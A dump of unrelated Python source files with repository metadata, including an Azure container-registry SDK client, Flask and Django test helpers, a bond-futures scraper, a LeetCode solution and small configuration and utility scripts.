for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("RegistryListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/providers/Microsoft.ContainerRegistry/registries"}
@distributed_trace_async
async def list_credentials(
self, resource_group_name: str, registry_name: str, **kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Lists the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryListCredentialsResult] = kwargs.pop("cls", None)
request = build_list_credentials_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_credentials.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryListCredentialsResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_credentials.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/listCredentials"
}
@overload
async def regenerate_credential(
self,
resource_group_name: str,
registry_name: str,
regenerate_credential_parameters: _models.RegenerateCredentialParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Regenerates one of the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param regenerate_credential_parameters: Specifies name of the password which should be
regenerated -- password or password2. Required.
:type regenerate_credential_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegenerateCredentialParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def regenerate_credential(
self,
resource_group_name: str,
registry_name: str,
regenerate_credential_parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Regenerates one of the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param regenerate_credential_parameters: Specifies name of the password which should be
regenerated -- password or password2. Required.
:type regenerate_credential_parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def regenerate_credential(
self,
resource_group_name: str,
registry_name: str,
regenerate_credential_parameters: Union[_models.RegenerateCredentialParameters, IO],
**kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Regenerates one of the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param regenerate_credential_parameters: Specifies name of the password which should be
regenerated -- password or password2. Is either a model type or a IO type. Required.
:type regenerate_credential_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegenerateCredentialParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.RegistryListCredentialsResult] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(regenerate_credential_parameters, (IO, bytes)):
_content = regenerate_credential_parameters
else:
_json = self._serialize.body(regenerate_credential_parameters, "RegenerateCredentialParameters")
request = build_regenerate_credential_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.regenerate_credential.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryListCredentialsResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
regenerate_credential.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/regenerateCredential"
}
@distributed_trace_async
async def list_usages(
self, resource_group_name: str, registry_name: str, **kwargs: Any
) -> _models.RegistryUsageListResult:
"""Gets the quota usages for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryUsageListResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryUsageListResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryUsageListResult] = kwargs.pop("cls", None)
request = build_list_usages_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_usages.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryUsageListResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_usages.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/listUsages"
}
| [
"[email protected]"
] | |
ba1d47b84928ddee170164408faa078f1f1dd689 | 3d7a3cb5044ad1334353fd06e6c4d8aa0990de89 | /tests/test_templatetags.py | f88ecbfa12a27294518006f9316519055bbfb499 | [
"MIT"
] | permissive | Convious/django-concurrency | ed46faf91e54be58d7ed8e030b764d9537bed240 | 815230336aa173bd73df1f411a77434944958c39 | refs/heads/develop | 2023-05-11T07:10:46.448831 | 2019-08-27T17:29:39 | 2019-08-27T17:29:39 | 225,925,608 | 0 | 0 | MIT | 2023-05-02T05:10:32 | 2019-12-04T17:53:48 | null | UTF-8 | Python | false | false | 679 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import logging
import pytest
from demo.models import SimpleConcurrentModel
from concurrency.templatetags.concurrency import identity, is_version, version
logger = logging.getLogger(__name__)
@pytest.fixture
def obj():
return SimpleConcurrentModel.objects.create()
@pytest.mark.django_db
def test_identity(obj):
assert identity(obj).split(',') == [str(obj.pk), str(obj.version)]
@pytest.mark.django_db
def test_version(obj):
assert version(obj) == obj.version
@pytest.mark.django_db
def test_is_version(obj):
assert is_version(obj._concurrencymeta.field)
| [
"[email protected]"
] | |
9d1001b8abd5c5a9bd0ccdf3d5411d67d97ac9cc | 61a21ed2dcdfe9a43588c5582eea38ce8fdfcbf2 | /akshare/bond/bond_futures.py | 404381fb3be49c7c36c462965ae3ccc93718a333 | [
"MIT"
] | permissive | huanghyw/akshare | 44187c6c56872d499651bb62c178ee837c776388 | ed84e937773c0420cc003793d74b73e64223e08b | refs/heads/master | 2023-04-22T07:06:08.929307 | 2021-05-02T16:05:59 | 2021-05-02T16:05:59 | 319,346,216 | 13 | 5 | MIT | 2021-05-02T16:05:59 | 2020-12-07T14:32:08 | null | UTF-8 | Python | false | false | 1,089 | py | # -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Date: 2020/10/10 13:42
Desc: ๅฝๅบๆ่ดงๅฏไบคๅฒๅธ็ธๅ
ณๆๆ
http://www.csindex.com.cn/zh-CN/bond-valuation/bond-futures-deliverable-coupons-related-indicators?date=2020-09-22
"""
import pandas as pd
import requests
def bond_futures_deliverable_coupons(trade_date: str = "2020-09-23") -> pd.DataFrame:
"""
ๅฝๅบๆ่ดงๅฏไบคๅฒๅธ็ธๅ
ณๆๆ
http://www.csindex.com.cn/zh-CN/bond-valuation/bond-futures-deliverable-coupons-related-indicators
:param trade_date: ไบคๆๆฅ
:type trade_date: str
:return: ๅฝๅบๆ่ดงๅฏไบคๅฒๅธ็ธๅ
ณๆๆ
:rtype: pandas.DataFrame
"""
url = "http://www.csindex.com.cn/zh-CN/bond-valuation/bond-futures-deliverable-coupons-related-indicators"
params = {
"date": trade_date
}
r = requests.get(url, params=params)
temp_df = pd.read_html(r.text)[0]
return temp_df
if __name__ == '__main__':
bond_futures_deliverable_coupons_df = bond_futures_deliverable_coupons(trade_date="2020-09-22")
print(bond_futures_deliverable_coupons_df)
| [
"[email protected]"
] | |
99f34fa74eaf2e0f18522bb675fe078774e0b38b | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /repos/simpleapi-master/example_project/client/python/flask/testclient.py | 467379407d15db6ef518a0bf3549f60eed722cb8 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | # -*- coding: utf-8 -*-
import sys
sys.path.append("../../../../")
from simpleapi.client import Client, RemoteException
calculator = Client(ns='http://localhost:5000/api/',
transport_type='xml', timeout=60)
print "5 + 5 =", calculator.add(a=5, b=16) | [
"[email protected]"
] | |
74db1bd87aa3d7a2b8f7237fe22f7e0d6381601d | f1d9df04036fc43c9e5cc7998b83261f4daa94b8 | /tests/base_test_case.py | 618b5e7cad75c6d2d82d4d926a30004158dacbc8 | [] | no_license | Eaterator/web | 019eb6547995be30b3468e5c44ecc52f05858fb4 | 9c598607f76ad770c66d85c47ffcec05f92f4d66 | refs/heads/master | 2021-01-09T20:30:13.417308 | 2017-04-25T02:44:35 | 2017-04-25T02:44:35 | 81,286,177 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,825 | py | from datetime import datetime
import json
import random
from application.app import create_app
from application.auth.models import Role, User
from application.auth.auth_utilities import PasswordUtilities, ACCESS_TOKEN_HEADER
from application.recipe.models import Ingredient, IngredientRecipe, Recipe
from application.auth.roles import ROLES
random.seed(1000)
class BaseTempDBTestCase:
"""
Creates helper functions to create fresh DB instance between tests, and helper function to populate
necessary data for tests to avoid mock responses to try to imitate real responses in production.
"""
def setUpDB(self):
from tests.tsting_config import SQLALCHEMY_DATABASE_URI
from application import config
config.SQLALCHEMY_DATABASE_URI = SQLALCHEMY_DATABASE_URI
self.app = create_app(app_config=config)
from application.base_models import db
self.db = db
with self.app.app_context():
self.db.session.remove()
self.db.session.close()
self.db.drop_all()
self.db.create_all()
self.roles = self.ingredients = self.recipes = None
self.test_client = self.app.test_client()
def create_recipes(self):
self.recipes = []
with self.app.app_context():
for recipe in RECIPES:
new_recipe = Recipe(**recipe)
self.db.session.add(new_recipe)
self.recipes.append(new_recipe)
self.db.session.commit()
def create_ingredients(self):
with self.app.app_context():
self.ingredients = []
for ingredient in INGREDIENTS:
new_ingredient = Ingredient(name=ingredient)
self.db.session.add(new_ingredient)
self.ingredients.append(new_ingredient)
self.db.session.commit()
def create_recipe_ingredients(self):
with self.app.app_context():
num_ingredients = 0
for recipe in self.recipes:
if num_ingredients < 5:
num_ingredients += 1
for ingredient in random.sample(self.ingredients, num_ingredients):
new_ingredient_recipe = IngredientRecipe(
ingredient=ingredient.pk,
recipe=recipe.pk
)
self.db.session.add(new_ingredient_recipe)
self.db.session.commit()
def create_roles(self):
with self.app.app_context():
self.roles = {}
for role in ROLES:
self.roles[role["name"]] = Role(**role)
self.db.session.add(self.roles[role["name"]])
self.db.session.commit()
def create_user(self, user_payload, role):
with self.app.app_context():
user = User(**user_payload)
user.password = PasswordUtilities.generate_password(user.password)
user.role = role.pk
self.db.session.add(user)
self.db.session.commit()
def create_regular_user(self):
with self.app.app_context():
if not self.roles:
self.create_roles()
self.create_user(TEST_REGULAR_USER, self.roles["regular"])
return TEST_REGULAR_USER
def create_business_user(self):
with self.app.app_context():
if not self.roles:
self.create_roles()
self.create_user(TEST_BUSINESS_USER, self.roles['corporate'])
return TEST_BUSINESS_USER
def create_admin_user(self):
with self.app.app_context():
if not self.roles:
self.create_roles()
self.create_user(TEST_ADMIN_USER, self.roles['admin'])
return TEST_ADMIN_USER
def get_jwt_token(self, user):
resp = self.test_client.post('/auth/',
data=json.dumps({
"username": user["username"],
"password": user["password"]
}),
content_type="application/json"
)
return json.loads(resp.data.decode('utf-8')).get(ACCESS_TOKEN_HEADER), resp
def tearDownDB(self):
with self.app.app_context():
self.db.session.remove()
self.db.session.close()
self.db.drop_all()
INGREDIENTS = ["chicken", "potato", "pepper", "onion", "carrot", "celery", "beef", "pork"]
RECIPES = [
{"title": "chicken with onions"},
{"title": "chicken with peppers"},
{"title": "chicken with potato"},
{"title": "chicken with potato and peppers"},
{"title": "onion with peppers and onion"},
{"title": "peppers with potato and onion"},
{"title": "chicken with onions"},
{"title": "chicken with peppers"},
{"title": "chicken with potato"},
{"title": "chicken with potato and peppers"},
{"title": "onion with peppers and onion"},
{"title": "peppers with potato and onion"},
]
TEST_REGISTER_USER_PAYLOAD = dict(
username="[email protected]",
password="TestUser123!",
confirm="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
TEST_REGULAR_USER = dict(
username="[email protected]",
password="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
TEST_BUSINESS_USER = dict(
username="[email protected]",
password="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
TEST_ADMIN_USER = dict(
username="[email protected]",
password="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
| [
"[email protected]"
] | |
c40a4d51b0c5e6ad6b99005c2341a3eccd0a3b90 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/leetcode/LeetCode/111 Minimum Depth of Binary Tree.py | f77921ed53bd989cfd4ee577d98dec3b06404713 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 875 | py | """
Given a binary tree, find its minimum depth.
The minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.
"""
__author__ = 'Danyang'
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def minDepth(self, root):
"""
:param root: TreeNode
:return: integer
"""
return self.fathom(root, 0)
def fathom(self, root, depth):
"""
DFS
"""
if not root: return depth
elif root.right and not root.left: return self.fathom(root.right, depth+1)
elif root.left and not root.right: return self.fathom(root.left, depth+1)
else: return min(self.fathom(root.left, depth+1),
self.fathom(root.right, depth+1)) | [
"[email protected]"
] | |
efd5603bda7dcc385b754567a05f493a43bc8d0b | ed48e992ad5fbb579afae6d0f7e6df775f8d306e | /lib/util.py | d5df4f598dd4accf11d107af1830400849d1696e | [] | no_license | sterlingbaldwin/e3sm_to_cmip | 6a23b92145c042af16979ff67b17555c3a9222e8 | bc5bcfaad5901eb6f07ab450eeab20144f4029cb | refs/heads/master | 2020-03-12T12:08:30.743456 | 2018-04-25T23:27:47 | 2018-04-25T23:27:47 | 130,611,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | import sys
import traceback
def format_debug(e):
"""
Return a string of an exceptions relavent information
"""
_, _, tb = sys.exc_info()
return """
1: {doc}
2: {exec_info}
3: {exec_0}
4: {exec_1}
5: {lineno}
6: {stack}
""".format(
doc=e.__doc__,
exec_info=sys.exc_info(),
exec_0=sys.exc_info()[0],
exec_1=sys.exc_info()[1],
lineno=traceback.tb_lineno(sys.exc_info()[2]),
stack=traceback.print_tb(tb)) | [
"[email protected]"
] | |
f8108f1761c2e56a4f7449a8e629de145543dded | e3f5f41b242650b4bef68aa191a5779aedd3e02e | /Chapter03/config.py | d12aeca3649c2d96b68e8b32d23a06c74a03f285 | [
"MIT"
] | permissive | PacktPublishing/Mastering-Flask-Web-Development-Second-Edition | d4675c047bb51b0154958205f53c962ab4d32e4c | c3174127b40f8af1e2ab5e614994ffed7acbc11b | refs/heads/master | 2023-05-11T00:23:30.213655 | 2023-01-18T09:14:14 | 2023-01-18T09:14:14 | 154,667,293 | 168 | 131 | MIT | 2023-05-01T20:52:13 | 2018-10-25T12:30:58 | Python | UTF-8 | Python | false | false | 483 | py | class Config(object):
POSTS_PER_PAGE = 10
class ProdConfig(Config):
SECRET_KEY = '\xcb\xd7\x8a.\x82\x9c1Lu\xf1&2\xf6i\xfa\x8e\xb1\xc9t^\xccW\xdbw'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
class DevConfig(Config):
DEBUG = True
SECRET_KEY = '\xa8\xcc\xeaP+\xb3\xe8 |\xad\xdb\xea\xd0\xd4\xe8\xac\xee\xfaW\x072@O3'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
| [
"[email protected]"
] | |
ccf8ee337ea275a691e6d35ae32738e200fead01 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/ZH3l/STXS_nanoAOD/v5/Full2018nano_STXS_1p1/aliases.py | 303e9601b0371fd3ca5cf4bb282c6e5665853816 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 2,914 | py | #Aliases (mostly btag)
mc = [skey for skey in samples if skey not in ('Fake', 'DATA')]
#2017
#bWP = '0.1522' #Loose
bWP = '0.4941'
aliases['bVeto'] = {
'expr': '(Sum$( CleanJet_pt > 20.0 && Jet_btagDeepB[CleanJet_jetIdx] > '+bWP+' ) == 0)'
}
aliases['dphilmet_mme'] = {
'expr': '( (abs(PuppiMET_phi-Lepton_phi[]) > 3.14159)*(abs(PuppiMET_phi-Lepton_phi[]) - 3.14159) + (abs(PuppiMET_phi-Lepton_phi[]) < 3.14159)*abs(PuppiMET_phi-Lepton_phi[]))*(abs(Lepton_pdgId[]) == 11 && abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) == 13*13*11) + -999*(abs(Lepton_pdgId[]) != 11 || abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) != 13*13*11)'
}
aliases['pt_e_mme'] = {
'expr': '(Lepton_pt[])*(abs(Lepton_pdgId[]) == 11 && abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) == 13*13*11) + -999*(abs(Lepton_pdgId[]) != 11 || abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) != 13*13*11)'
}
# Temporary patch for BTV postprocessor bug (no SF for eta < 0, <= 102X_nAODv5_Full2018v5)
#2017
btagSFSource = '%s/src/PhysicsTools/NanoAODTools/data/btagSF/DeepCSV_94XSF_V2_B_F.csv' % os.getenv('CMSSW_BASE')
aliases['Jet_btagSF_shapeFix'] = {
'linesToAdd': [
'gSystem->Load("libCondFormatsBTauObjects.so");',
'gSystem->Load("libCondToolsBTau.so");',
'gSystem->AddIncludePath("-I%s/src");' % os.getenv('CMSSW_RELEASE_BASE'),
'.L %s/src/PlotsConfigurations/Configurations/patches/btagsfpatch.cc+' % os.getenv('CMSSW_BASE')
],
'class': 'BtagSF',
'args': (btagSFSource,),
'samples': mc
}
aliases['btagSF'] = {
'expr': '( TMath::Exp(Sum$( TMath::Log( (CleanJet_pt>20 && abs(CleanJet_eta)<2.5)*Jet_btagSF_shapeFix[CleanJet_jetIdx]+1*(CleanJet_pt<20 || abs(CleanJet_eta)>2.5) ) ) ) )',
'samples': mc
}
systs = ['jes','lf','hf','lfstats1','lfstats2','hfstats1','hfstats2','cferr1','cferr2']
for s in systs:
aliases['Jet_btagSF_shapeFix_up_%s' % s] = {
'class': 'BtagSF',
'args': (btagSFSource, 'up_' + s),
'samples': mc
}
aliases['Jet_btagSF_shapeFix_down_%s' % s] = {
'class': 'BtagSF',
'args': (btagSFSource, 'down_' + s),
'samples': mc
}
aliases['btagSF'+s+'up'] = {
'expr': aliases['btagSF']['expr'].replace('shapeFix','shapeFix_up_'+s),
'samples':mc
}
aliases['btagSF'+s+'down'] = {
'expr': aliases['btagSF']['expr'].replace('shapeFix','shapeFix_down_'+s),
'samples':mc
}
aliases['EleWPTight'] = {
'expr' : '(abs(Lepton_pdgId[0])==13 || Electron_cutBased[Lepton_electronIdx[0]]>=4) \
&& (abs(Lepton_pdgId[1])==13 || Electron_cutBased[Lepton_electronIdx[1]]>=4) \
&& (abs(Lepton_pdgId[2])==13 || Electron_cutBased[Lepton_electronIdx[2]]>=4)',
}
aliases['genZPt'] = {
'expr': 'Sum$(GenPart_pt*(abs(GenPart_pdgId)==23&&((GenPart_statusFlags&8192)==8192)))',
'samples' : mc
}
| [
"[email protected]"
] | |
0f549c7b98395f5a504787ed41be7b2cb7f15398 | 3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed | /Algorithms/LeetCode/L1268suggestedProducts.py | 6022d3b1d95efdd64998c9ee172cc452f33506fb | [] | no_license | arunachalamev/PythonProgramming | c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c | ea188aaa1b72511aeb769a2829055d0aae55e73e | refs/heads/master | 2021-06-04T03:50:37.976293 | 2020-11-12T19:52:28 | 2020-11-12T19:52:28 | 97,364,002 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | # Given an array of strings products and a string searchWord. We want to design a system that suggests
# at most three product names from products after each character of searchWord is typed.
# Suggested products should have common prefix with the searchWord. If there are more than three products
# with a common prefix return the three lexicographically minimums products.
# Return list of lists of the suggested products after each character of searchWord is typed.
def suggestedProducts(products,searchWord):
products.sort()
temp = ""
output = list()
for char in searchWord:
temp = temp + char
result = [k for k in products if k.startswith(temp)]
if len(result) > 3:
output.append(result[:3])
else:
output.append(result)
return output
print (suggestedProducts(["mobile","mouse","moneypot","monitor","mousepad"],"mouse"))
print (suggestedProducts(["havana"],"havana"))
print (suggestedProducts(["havana"],"titanic"))
| [
"[email protected]"
] | |
a3a3f127f0d5d5d6cd29ffc6073cb8100e216345 | 976f270299c39d9c1c20a3ac3022ac1a32fc2f68 | /project/helper.py | d4455cd0799708cf80401e7ac4100741675059e2 | [
"Apache-2.0"
] | permissive | yazici/starthinker | 958bfe35e4a8a422c7f4146c8eb36de05c2e6761 | bdbac52ee57add39f71c37e599fbf5eb03782e20 | refs/heads/master | 2020-04-29T21:23:36.852893 | 2019-03-11T07:31:24 | 2019-03-11T07:31:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,488 | py | ###########################################################################
#
# Copyright 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
"""Evaluate the validity of a json file. Helps in debugging recipes.
Print the line and character position of any errors in the given json file.
Arguments
file - path to JSON file to be evaluated
Example
python project/helper.py project/sample.json
"""
import argparse
from starthinker.util.project import get_project
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file', help='A JSON file.')
parser.add_argument('--debug', '-d', help='Debug mode, do not scrub newlines.', action='store_true')
args = parser.parse_args()
try:
project = get_project(args.file, debug=args.debug)
print 'JSON OK:', args.file
except Exception, e:
print 'JSON ERROR:', args.file, str(e)
| [
"[email protected]"
] | |
79bf0be94707c72897e7b2b72d58a43560d61f7d | 5708bbb9da243bec789a3ddff394e12cf89c956e | /tests/write_separate_files.py | 58e04e16985c97f39e36590ecec220a4b00e12f5 | [] | no_license | webclinic017/CacheFS | 39d9f2898ab3f9cf3dc0d1dd64a4a323be8fe09d | 8a50cfe0301e1938753817138411dcc4b0a68bcd | refs/heads/master | 2023-03-14T20:14:00.018678 | 2020-08-04T12:48:47 | 2020-08-04T12:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | import sys
import os
import shutil
num = int(sys.argv[1])
assert 0<num<20
port = 1234 + num
path = '/data/cache%d/yxr' % num
if not os.path.isdir(path):
os.makedirs(path)
def app(env, start_response):
name = path + env['PATH_INFO']
with open(name, 'w') as f:
shutil.copyfileobj(env['wsgi.input'], f)
start_response('200 ok', [('Content-Length', str(len(name)))])
return name
import bjoern
bjoern.run(app, '0.0.0.0', port)
| [
"[email protected]"
] | |
75efac61085d8599a4694b34ba6e566b551e5886 | 6773e281d2000faf724713571a326fe5440acce2 | /phone/migrations/0002_auto_20210320_2137.py | fff685720e89d0996234dbaf8a556e1cac735d1a | [] | no_license | abhisheksahu92/Phone-Directory | 4a16f69504e5153c29fbeceaad0c4a7e19f72c1c | 87ed73c015caf3c05364e02b6364756d2e1f87a4 | refs/heads/main | 2023-04-20T09:56:56.697106 | 2021-05-10T12:35:10 | 2021-05-10T12:35:10 | 349,765,236 | 0 | 0 | null | 2021-05-10T12:33:51 | 2021-03-20T15:37:39 | HTML | UTF-8 | Python | false | false | 405 | py | # Generated by Django 3.1.7 on 2021-03-20 16:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('phone', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='phonemodel',
name='middle_name',
field=models.CharField(blank=True, max_length=10, null=True),
),
]
| [
"[email protected]"
] | |
